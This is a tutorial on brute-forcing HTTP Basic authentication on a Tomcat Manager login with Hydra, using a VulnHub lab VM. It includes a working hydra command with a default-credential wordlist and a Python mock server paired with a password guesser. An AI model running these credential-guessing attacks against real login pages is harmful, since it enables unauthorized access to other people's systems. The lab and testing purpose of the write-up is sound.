Brute Force HTTP Basic Authentication with Hydra

Process Overview

The basic process to begin brute forcing web logins with Hydra goes like this:

  1. Open your web browser
  2. Navigate to the target site
  3. Open the browser developer tools
    Or, configure traffic to go through an HTTP proxy (e.g. Burp Suite)
  4. Make a login attempt to the target service
  5. Inspect the request using the browser developer tools or proxied request
    • Note the target URL
    • Note the HTTP method
    • Note any special headers
    • Note any request body / payload
    • Note the server response for invalid logins

Brute Force Basic Authentication

Excellent overview of HTTP basic authentication: https://www.youtube.com/watch?v=rhi1eIjSbvk
Target I am using in this example: https://vulnhub.com/entry/hacksudo-101,650/

Analyzing the Application

Apache Tomcat is running on TCP/8080 on the target

  • Click Manager App, prompted for login
    • Browser sends GET /manager/html HTTP/1.1
  • Server responds HTTP 401
    • Includes the WWW-Authenticate: Basic realm="Tomcat Manager Application" header, which tells the browser to use Basic authentication

  • Browser prompts user for username and password

  • We input the following
    • Username: tomcat
    • Password: s3cret
    • Press Sign in
  • Browser sends GET /manager/html HTTP/1.1 again
    • This time it includes the Authorization: Basic dG9tY2F0OnMzY3JldA== header to authenticate
    • dG9tY2F0OnMzY3JldA== is tomcat:s3cret base64-encoded (encoded, not encrypted: anyone who can read the header recovers the password)
  • Server responds HTTP 401 due to incorrect credentials

Review of the Findings

  • Note the target URL: http://10.10.99.171:8080/manager/html
  • Note the HTTP method: HTTP GET
  • Note any special headers: N/A, no cookies or other session data
  • Note any request body / payload: No request body sent with HTTP GET
  • Note the server response for invalid logins: The server responded HTTP 401

Using Findings with Hydra

Hydra http-get Module

  • As noted in the test case, the client sends Authorization: Basic <base64> in an HTTP GET request
  • There's no data in the request body
  • Therefore, we can use the Hydra http-get module
hydra -U http-get

Hydra http-get module help text:
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-12-14 19:15:10

Help for module http-get:
============================================================================
Module http-get requires the page to authenticate.
The following parameters are optional:
 (a|A)=auth-type   specify authentication mechanism to use: BASIC, NTLM or MD5
 (h|H)=My-Hdr\: foo   to send a user defined HTTP header with each request
 (F|S)=check for text in the HTTP reply. S= means if this text is found, a
       valid account has been found, F= means if this string is present the
       combination is invalid. Note: this must be the last option supplied.
For example:  "/secret" or "http://bla.com/foo/bar:H=Cookie\: sessid=aaaa" or "https://test.com:8080/members:A=NTLM"

Example Command

I'm using -t 1 because, during testing on this target, I found that the server would blacklist me after too many failed login attempts in succession. I'm not sure if it'll auto-remove after waiting, but I have the VM running in my environment, so I just rebooted it and tested again.

WORDLIST='/usr/share/seclists/Passwords/Default-Credentials/tomcat-betterdefaultpasslist.txt'
hydra -I -V -C "$WORDLIST" -t 1 "http-get://10.9.9.12:8080/manager/html:A=BASIC:F=401"

Use -C with a wordlist of "colon-delimited" username:password pairs (e.g. admin:password123) instead of separate -L/-P lists. -t 1 runs a single task so attempts go one at a time, -I skips the restore-file prompt, and -V prints every login/password tried. In the target string, A=BASIC tells the http-get module to send Basic credentials and F=401 tells it that any response containing 401 is a failed login, which means any other response is reported as a hit.

Hydra reports two valid logins for the Tomcat server. Because F=401 only marks responses containing 401 as failures, any other status is reported as a hit too (for example a 403 for a user who authenticates but lacks the manager-gui role), so confirm each reported pair by hand, e.g. with curl -u user:pass against the same URL and checking for a 200.
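To make the exchange analyzed above and the F=401 rule concrete, here is an added Python example (written for this page, not the author's code and not Hydra's). It runs a mock /manager/html on localhost that answers 401 with a WWW-Authenticate: Basic header exactly as Tomcat did, encodes tomcat:s3cret into the same dG9tY2F0OnMzY3JldA== header the browser sent, and then guesses against the mock from a colon-delimited list one request at a time, treating any reply that is not a 401 as a hit. The user store, roles and wordlist are constructed for the mock and are not the VM's; the mock deliberately includes a valid user without the manager role, which comes back as a 403 and is therefore reported as a hit as well.

```python
"""Basic-auth exchange plus a single-threaded guesser that applies Hydra's
A=BASIC:F=401 rule. Added example for this page; not Hydra's or Tomcat's code."""
import base64
import http.client
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer

# Constructed credential store for the mock target (assumption, not the VM's users).
# 'tomcat' holds the manager role; 'viewer' authenticates but is not authorized.
USERS = {"tomcat": "s3cret", "viewer": "viewer"}
AUTHORIZED = {"tomcat"}
REALM = "Tomcat Manager Application"

# Constructed colon-delimited list, same shape as Hydra's -C input.
WORDLIST = """admin:admin
tomcat:tomcat
viewer:viewer
admin:s3cret
tomcat:s3cret
"""


def basic_credential(user, password):
    """Encode user:password the way the browser built the Authorization header."""
    return base64.b64encode(f"{user}:{password}".encode()).decode()


def decode_basic(header_value):
    """Recover (user, password) from 'Basic <base64>'; passwords may contain ':'."""
    scheme, _, b64 = header_value.partition(" ")
    if scheme.lower() != "basic":
        raise ValueError("not a Basic credential")
    user, _, password = base64.b64decode(b64).decode().partition(":")
    return user, password


class ManagerHandler(BaseHTTPRequestHandler):
    """Mock /manager/html: 401 for missing/bad creds, 403 valid user without role, 200 ok."""

    def do_GET(self):
        header = self.headers.get("Authorization")
        if header is None:
            return self._reply(401)
        try:
            user, password = decode_basic(header)
        except Exception:  # malformed base64 or non-UTF-8 payload
            return self._reply(401)
        if USERS.get(user) != password:
            return self._reply(401)
        if user not in AUTHORIZED:
            return self._reply(403)
        self._reply(200)

    def _reply(self, code):
        self.send_response(code)
        if code == 401:
            # The challenge that makes the browser prompt for credentials.
            self.send_header("WWW-Authenticate", f'Basic realm="{REALM}"')
        self.send_header("Content-Length", "0")
        self.end_headers()

    def log_message(self, *args):  # keep the mock quiet
        pass


def start_mock_server():
    """Start the mock target on an ephemeral localhost port; returns (server, port)."""
    server = HTTPServer(("127.0.0.1", 0), ManagerHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server, server.server_address[1]


def try_login(host, port, path, user, password):
    """One GET carrying Authorization: Basic; returns the HTTP status code."""
    conn = http.client.HTTPConnection(host, port, timeout=5)
    headers = {"Authorization": "Basic " + basic_credential(user, password)}
    conn.request("GET", path, headers=headers)
    status = conn.getresponse().status
    conn.close()
    return status


def guess_basic(host, port, path, wordlist):
    """Walk a colon-delimited list one request at a time (like hydra -t 1).

    Mirrors F=401: only a 401 is a failure, so a 403 for a valid user who
    lacks the manager role is reported as a hit too and must be re-checked.
    """
    hits = []
    for line in wordlist.splitlines():
        if not line.strip():
            continue
        user, _, password = line.partition(":")
        status = try_login(host, port, path, user, password)
        if status != 401:
            hits.append((user, password, status))
    return hits


if __name__ == "__main__":
    srv, port = start_mock_server()
    print("Authorization: Basic " + basic_credential("tomcat", "s3cret"))
    for hit in guess_basic("127.0.0.1", port, "/manager/html", WORDLIST):
        print("hit:", hit)
    srv.shutdown()
```

Running it prints the same Authorization header the browser sent and two hits: viewer:viewer with a 403 and tomcat:s3cret with a 200. Only the 200 is a usable login, which is why each pair Hydra reports should be re-checked against the real target before it is treated as valid.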